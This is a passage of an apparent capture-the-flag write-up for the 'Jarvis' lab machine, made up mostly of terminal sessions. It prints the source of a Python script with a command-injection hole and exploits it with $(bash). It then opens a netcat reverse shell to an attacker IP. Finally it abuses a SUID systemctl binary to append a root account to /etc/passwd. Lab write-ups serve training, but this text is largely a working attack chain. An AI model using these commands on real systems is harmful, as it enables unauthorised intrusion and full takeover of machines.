autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
headers_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
reqtimeout_module (shared)
setenvif_module (shared)
status_module (shared)

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl

[-] Installed compilers:
ii g++ 4:6.3.0-4 amd64 GNU C++ compiler
ii g++-6 6.3.0-18+deb9u1 amd64 GNU C++ compiler
ii gcc 4:6.3.0-4 amd64 GNU C compiler
ii gcc-6 6.3.0-18+deb9u1 amd64 GNU C compiler

[-] Can we read/write sensitive files:
-rw-r–r– 1 root root 1546 Nov 9 20:02 /etc/passwd
-rw-r–r– 1 root root 679 Mar 4 2019 /etc/group
-rw-r–r– 1 root root 767 Mar 4 2016 /etc/profile
-rw-r—– 1 root shadow 959 Mar 5 2019 /etc/shadow

[-] SUID files:
-rwsr-xr-x 1 root root 30800 Aug 21 2018 /bin/fusermount
-rwsr-xr-x 1 root root 44304 Mar 7 2018 /bin/mount
-rwsr-xr-x 1 root root 61240 Nov 10 2016 /bin/ping
-rwsr-x— 1 root pepper 174520 Feb 17 2019 /bin/systemctl
-rwsr-xr-x 1 root root 31720 Mar 7 2018 /bin/umount
-rwsr-xr-x 1 root root 40536 May 17 2017 /bin/su
-rwsr-s— 1 pepper pepper 174520 Nov 10 00:37 /home/pepper/systemctl
-rwsr-xr-x 1 root root 40312 May 17 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59680 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 75792 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40504 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 140944 Jun 5 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 50040 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 440728 Mar 1 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr– 1 root messagebus 42992 Mar 2 2018 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

[+] Possibly interesting SUID files:
-rwsr-x— 1 root pepper 174520 Feb 17 2019 /bin/systemctl
-rwsr-s— 1 pepper pepper 174520 Nov 10 00:37 /home/pepper/systemctl

[-] SGID files:
-rwsr-s— 1 pepper pepper 174520 Nov 10 00:37 /home/pepper/systemctl
-rwxr-sr-x 1 root shadow 35592 May 27 2017 /sbin/unix_chkpwd
-rwxr-sr-x 1 root ssh 358624 Mar 1 2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root crontab 40264 Oct 7 2017 /usr/bin/crontab
-rwxr-sr-x 1 root mail 19008 Jan 17 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 71856 May 17 2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 27448 Mar 7 2018 /usr/bin/wall
-rwxr-sr-x 1 root shadow 22808 May 17 2017 /usr/bin/expiry
-rwxr-sr-x 1 root tty 14768 Apr 12 2017 /usr/bin/bsd-write
-rwxr-sr-x 1 root utmp 10232 Feb 18 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter

[+] Possibly interesting SGID files:
-rwsr-s— 1 pepper pepper 174520 Nov 10 00:37 /home/pepper/systemctl

[-] Can’t search *.conf files as no keyword was entered

[-] Can’t search *.php files as no keyword was entered

[-] Can’t search *.log files as no keyword was entered

[-] Can’t search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r–r– 1 root root 552 May 27 2017 /etc/pam.conf
-rw-r–r– 1 root root 973 Jan 31 2017 /etc/mke2fs.conf
-rw-r–r– 1 root root 2981 Mar 2 2019 /etc/adduser.conf
-rw-r–r– 1 root root 599 May 5 2015 /etc/logrotate.conf
-rw-r–r– 1 root root 144 Mar 2 2019 /etc/kernel-img.conf
-rw-r–r– 1 root root 1260 Mar 16 2016 /etc/ucf.conf
-rw-r–r– 1 root root 57 Aug 7 08:14 /etc/resolv.conf
-rw-r–r– 1 root root 2683 May 17 2018 /etc/sysctl.conf
-rw-r–r– 1 root root 2969 May 21 2017 /etc/debconf.conf
-rw-r–r– 1 root root 4781 May 15 2018 /etc/hdparm.conf
-rw-r–r– 1 root root 1963 Jan 18 2017 /etc/rsyslog.conf
-rw-r–r– 1 root root 34 Mar 2 2018 /etc/ld.so.conf
-rw-r–r– 1 root root 280 Jul 26 2018 /etc/fuse.conf
-rw-r–r– 1 root root 191 Apr 12 2017 /etc/libaudit.conf
-rw-r–r– 1 root root 9 Aug 7 2006 /etc/host.conf
-rw-r–r– 1 root root 3173 Jul 3 2018 /etc/reportbug.conf
-rw-r–r– 1 root root 346 Feb 26 2018 /etc/discover-modprobe.conf
-rw-r–r– 1 root root 604 Jun 26 2016 /etc/deluser.conf
-rw-r–r– 1 root root 6790 Mar 2 2019 /etc/ca-certificates.conf
-rw-r–r– 1 root root 2584 Aug 1 2016 /etc/gai.conf
-rw-r–r– 1 root root 497 Feb 6 2019 /etc/nsswitch.conf

[-] Location and contents (if accessible) of .bash_history file(s):
/home/pepper/.bash_history

[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Mar 2 2019 .
drwxr-xr-x 12 root root 4096 Mar 2 2019 ..

### SCAN COMPLETE ####################################

www-data@jarvis:/var/www/Admin-Utilities$ sudo -u pepper ./simpler.py -p
sudo -u pepper ./simpler.py -p
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | ‘_ ` _ \| ‘_ \| |/ _ \ ‘__| ‘_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es

***********************************************

Enter an IP: $(id)
$(id)
ping: groups=1000(pepper): Temporary failure in name resolution

root@kali:~/Downloads# stty raw -echo
root@kali:~/Downloads# nc -lvnp 8888

www-data@jarvis:/var/www/Admin-Utilities$

www-data@jarvis:/var/www/Admin-Utilities$ export TERM=screen

www-data@jarvis:/var/www/Admin-Utilities$ cd /home/

www-data@jarvis:/home$ ls
pepper

www-data@jarvis:/home$ cd pepper

www-data@jarvis:/home/pepper$ ls -al
total 208
drwxr-xr-x 4 pepper pepper 4096 Nov 10 00:37 .
drwxr-xr-x 3 root root 4096 Mar 2 2019 ..
lrwxrwxrwx 1 root root 9 Mar 4 2019 .bash_history -> /dev/null
-rw-r–r– 1 pepper pepper 220 Mar 2 2019 .bash_logout
-rw-r–r– 1 pepper pepper 3526 Mar 2 2019 .bashrc
drwxr-xr-x 2 pepper pepper 4096 Mar 2 2019 .nano
-rw-r–r– 1 pepper pepper 675 Mar 2 2019 .profile
drwxr-xr-x 3 pepper pepper 4096 Mar 4 2019 Web
-rw-r–r– 1 pepper pepper 0 Nov 9 22:46 hacked
-rw-r–r– 1 pepper pepper 122 Nov 9 22:42 hacked.service
-rwsr-s— 1 pepper pepper 174520 Nov 10 00:37 systemctl
-r–r—– 1 root pepper 33 Mar 5 2019 user.txt

www-data@jarvis:/home/pepper$ cat user.txt
cat: user.txt: Permission denied

www-data@jarvis:/home/pepper$ cat user.txt
cat: user.txt: Permission denied
www-data@jarvis:/home/pepper$ sudo -l
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

www-data@jarvis:/home/pepper$ sudo -u pepper /var/www/Admin-Utilities/simpler.py
***********************************************ar/www/Admin-Utilities/simpler.py
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | ‘_ ` _ \| ‘_ \| |/ _ \ ‘__| ‘_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es

***********************************************

********************************************************
* Simpler – A simple simplifier 😉 *
* Version 1.0 *
********************************************************
Usage: python3 simpler.py [options]

Options:
-h/–help : This help
-s : Statistics
-l : List the attackers IP
-p : ping an attacker IP

www-data@jarvis:/home/pepper$ cat /var/www/Admin-Utilities/simpler.py
#!/usr/bin/env python3
from datetime import datetime
import sys
import os
from os import listdir
import re

def show_help():
message=”’
********************************************************
* Simpler – A simple simplifier 😉 *
* Version 1.0 *
********************************************************
Usage: python3 simpler.py [options]

Options:
-h/–help : This help
-s : Statistics
-l : List the attackers IP
-p : ping an attacker IP
”’
print(message)

def show_header():
print(”’***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | ‘_ ` _ \| ‘_ \| |/ _ \ ‘__| ‘_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es

***********************************************
”’)

def show_statistics():
path = ‘/home/pepper/Web/Logs/’
print(‘Statistics\n———–‘)
listed_files = listdir(path)
count = len(listed_files)
print(‘Number of Attackers: ‘ + str(count))
level_1 = 0
dat = datetime(1, 1, 1)
ip_list = []
reks = []
ip = ”
req = ”
rek = ”
for i in listed_files:
f = open(path + i, ‘r’)
lines = f.readlines()
level2, rek = get_max_level(lines)
fecha, requ = date_to_num(lines)
ip = i.split(‘.’)[0] + ‘.’ + i.split(‘.’)[1] + ‘.’ + i.split(‘.’)[2] + ‘.’ + i.split(‘.’)[3]
if fecha > dat:
dat = fecha
req = requ
ip2 = i.split(‘.’)[0] + ‘.’ + i.split(‘.’)[1] + ‘.’ + i.split(‘.’)[2] + ‘.’ + i.split(‘.’)[3]
if int(level2) > int(level_1):
level_1 = level2
ip_list = [ip]
reks=[rek]
elif int(level2) == int(level_1):
ip_list.append(ip)
reks.append(rek)
f.close()

print(‘Most Risky:’)
if len(ip_list) > 1:
print(‘More than 1 ip found’)
cont = 0
for i in ip_list:
print(‘ ‘ + i + ‘ – Attack Level : ‘ + level_1 + ‘ Request: ‘ + reks[cont])
cont = cont + 1

print(‘Most Recent: ‘ + ip2 + ‘ –> ‘ + str(dat) + ‘ ‘ + req)

def list_ip():
print(‘Attackers\n———–‘)
path = ‘/home/pepper/Web/Logs/’
listed_files = listdir(path)
for i in listed_files:
f = open(path + i,’r’)
lines = f.readlines()
level,req = get_max_level(lines)
print(i.split(‘.’)[0] + ‘.’ + i.split(‘.’)[1] + ‘.’ + i.split(‘.’)[2] + ‘.’ + i.split(‘.’)[3] + ‘ – Attack Level : ‘ + level)
f.close()

def date_to_num(lines):
dat = datetime(1,1,1)
ip = ”
req=”
for i in lines:
if ‘Level’ in i:
fecha=(i.split(‘ ‘)[6] + ‘ ‘ + i.split(‘ ‘)[7]).split(‘\n’)[0]
regex = ‘(\d+)-(.*)-(\d+)(.*)’
logEx=re.match(regex, fecha).groups()
mes = to_dict(logEx[1])
fecha = logEx[0] + ‘-‘ + mes + ‘-‘ + logEx[2] + ‘ ‘ + logEx[3]
fecha = datetime.strptime(fecha, ‘%Y-%m-%d %H:%M:%S’)
if fecha > dat:
dat = fecha
req = i.split(‘ ‘)[8] + ‘ ‘ + i.split(‘ ‘)[9] + ‘ ‘ + i.split(‘ ‘)[10]
return dat, req

def to_dict(name):
month_dict = {‘Jan’:’01’,’Feb’:’02’,’Mar’:’03’,’Apr’:’04’, ‘May’:’05’, ‘Jun’:’06’,’Jul’:’07’,’Aug’:’08’,’Sep’:’09’,’Oct’:’10’,’Nov’:’11’,’Dec’:’12’}
return month_dict[name]

def get_max_level(lines):
level=0
for j in lines:
if ‘Level’ in j:
if int(j.split(‘ ‘)[4]) > int(level):
level = j.split(‘ ‘)[4]
req=j.split(‘ ‘)[8] + ‘ ‘ + j.split(‘ ‘)[9] + ‘ ‘ + j.split(‘ ‘)[10]
return level, req

def exec_ping():
forbidden = [‘&’, ‘;’, ‘-‘, ‘`’, ‘||’, ‘|’]
command = input(‘Enter an IP: ‘)
for i in forbidden:
if i in command:
print(‘Got you’)
exit()
os.system(‘ping ‘ + command)

if __name__ == ‘__main__’:
show_header()
if len(sys.argv) != 2:
show_help()
exit()
if sys.argv[1] == ‘-h’ or sys.argv[1] == ‘–help’:
show_help()
exit()
elif sys.argv[1] == ‘-s’:
show_statistics()
exit()
elif sys.argv[1] == ‘-l’:
list_ip()
exit()
elif sys.argv[1] == ‘-p’:
exec_ping()
exit()
else:
show_help()
exit()

The most interesting function in this script is exec_ping:

def exec_ping():
forbidden = [‘&’, ‘;’, ‘-‘, ‘`’, ‘||’, ‘|’]
command = input(‘Enter an IP: ‘)
for i in forbidden:
if i in command:
print(‘Got you’)
exit()
os.system(‘ping ‘ + command)

now on another terminal

www-data@jarvis:/home/pepper$ sudo -u pepper /var/www/Admin-Utilities/simpler.py
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | ‘_ ` _ \| ‘_ \| |/ _ \ ‘__| ‘_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es

***********************************************

Enter an IP: $(bash)

pepper@jarvis:~$

pepper@jarvis:~$ id
pepper@jarvis:~$ cat user.txt
pepper@jarvis:~$ ls -la

on another terminal

root@kali:~/Downloads# nc -lvnp 1338
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1338
Ncat: Listening on 0.0.0.0:1338

on previous shell

pepper@jarvis:~$ nc -e /bin/bash 10.10.15.149 1338

and on another listner shell

we get the shell

root@kali:~/Downloads# nc -lvnp 1338
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1338
Ncat: Listening on 0.0.0.0:1338
Ncat: Connection from 10.10.10.143.
Ncat: Connection from 10.10.10.143:38548.
python -c ‘import pty; pty.spawn(“/bin/bash”)’
pepper@jarvis:~$

pepper@jarvis:~$ export TERM=screen

pepper@jarvis:~$ id
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)

pepper@jarvis:~$ ls -al
total 220
drwxr-xr-x 5 pepper pepper 4096 Nov 10 02:08 .
drwxr-xr-x 3 root root 4096 Mar 2 2019 ..
lrwxrwxrwx 1 root root 9 Mar 4 2019 .bash_history -> /dev/null
-rw-r–r– 1 pepper pepper 220 Mar 2 2019 .bash_logout
-rw-r–r– 1 pepper pepper 3526 Mar 2 2019 .bashrc
drwxr-xr-x 3 pepper pepper 4096 Nov 10 01:13 .config
drwxr-xr-x 2 pepper pepper 4096 Mar 2 2019 .nano
-rw-r–r– 1 pepper pepper 675 Mar 2 2019 .profile
-rw-r–r– 1 pepper pepper 123 Nov 10 01:58 1.service
drwxr-xr-x 3 pepper pepper 4096 Mar 4 2019 Web
-rw-r–r– 1 pepper pepper 45 Nov 10 00:50 hacked
-rw-r–r– 1 pepper pepper 122 Nov 9 22:42 hacked.service
-rwsr-s— 1 pepper pepper 174520 Nov 10 00:52 systemctl
-r–r—– 1 root pepper 33 Mar 5 2019 user.txt

pepper@jarvis:~$ cat user.txt
2afa36c4f05b37bXXXXXXXXXXXXXXXXXXXXXXXXXXX

pepper@jarvis:~$ find / -perm -4000 2>/dev/null
/bin/fusermount
/bin/mount
/bin/ping
/bin/systemctl
/bin/umount
/bin/su
/home/pepper/systemctl
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

to /etc/passwd to enable us to su as root with the credentials rooot : AAAA

pepper@jarvis:/dev/shm$ nano root.service

[Unit]
Description=pwned

[Service]
ExecStart=/dev/shm/root.sh

[Install]
WantedBy=multi-user.target

pepper@jarvis:/dev/shm$ cat root.service
[Unit]
Description=pwned

[Service]
ExecStart=/dev/shm/root.sh

[Install]
WantedBy=multi-user.target

pepper@jarvis:/dev/shm$ nano root.sh

pepper@jarvis:/dev/shm$ chmod +x root.sh

pepper@jarvis:/dev/shm$ cat root.sh

#!/bin/bash
echo ‘rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash’ >> /etc/passwd

I enabled the service and started it:

pepper@jarvis:/dev/shm$ systemctl enable /dev/shm/root.service
Created symlink /etc/systemd/system/multi-user.target.wants/root.service -> /dev/shm/root.service.
Created symlink /etc/systemd/system/root.service -> /dev/shm/root.service.

pepper@jarvis:/dev/shm$ systemctl start root.service

pepper@jarvis:/dev/shm$

Now if we check /etc/passwd we’ll see that it has been modified:

pepper@jarvis:/dev/shm$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
pepper:x:1000:1000:,,,:/home/pepper:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash

pepper@jarvis:/dev/shm$ su rooot
password : AAAA

root@jarvis:/dev/shm# cd /root

root@jarvis:~# ls -la

root@jarvis:~# cat root.txt
d41d8cd98f00bXXXXXXXXXXXXXXXXXXXXXXXXX

@SAKSHAM DIXIT